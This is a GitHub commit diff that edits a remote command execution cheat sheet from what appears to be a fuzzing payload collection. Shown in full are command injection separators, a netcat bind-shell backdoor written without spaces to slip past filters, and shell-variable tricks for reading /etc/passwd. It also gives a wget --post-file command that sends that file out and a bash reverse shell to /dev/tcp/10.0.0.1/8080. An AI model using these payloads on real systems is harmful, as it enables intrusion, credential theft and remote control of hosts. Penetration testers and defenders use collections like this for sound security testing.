Update docs: remote command exec without spaces

This commit is contained in:
Adam Muntner 2016-10-04 00:22:49 -04:00 committed by GitHub
parent 1f4867321f
commit d1209f4b31

View file

@ -3,12 +3,10 @@ Remote Command Exec Cheatsheet
File notes
**source-disc-cmd-exec-traversal.fuzz.txt**
usage
usage<br>
```GET /path/*payload*relative/path/to/target/file/```
**Executing Commands**
Seperating Commands<br>
``` blah;blah2 ```
@ -40,14 +38,13 @@ Example netcat backdoor without spaces:<br>
``` {chmod,+x,./nc} ```<br>
``` {./nc,-l,-p,6666,-e,/bin/bash} ```<br>
<b>Shell Variables</b>
<b>Shell Variables</b><br>
``` CMD=$'cat\x20/etc/passwd';$CMD ```
<br>shell variable increment through file one line at a time</b>
shell variable, increment through file one line at a time: <br>
increment the first +1 to retreive the entire file, line by line<br>
``` SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1 ```
**Exfiltrating Files / Data**
FTP <br>
@ -66,11 +63,10 @@ WGET: <br>
``` 'wget --post-file /etc/passwd' ```
**One-Liner Reverse Shells**
On the listener <br>
``` $ nc -l -p 8080 -vvv' ```
On the remote host...
On the remote host...<br>
Bash:<br>
``` $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ```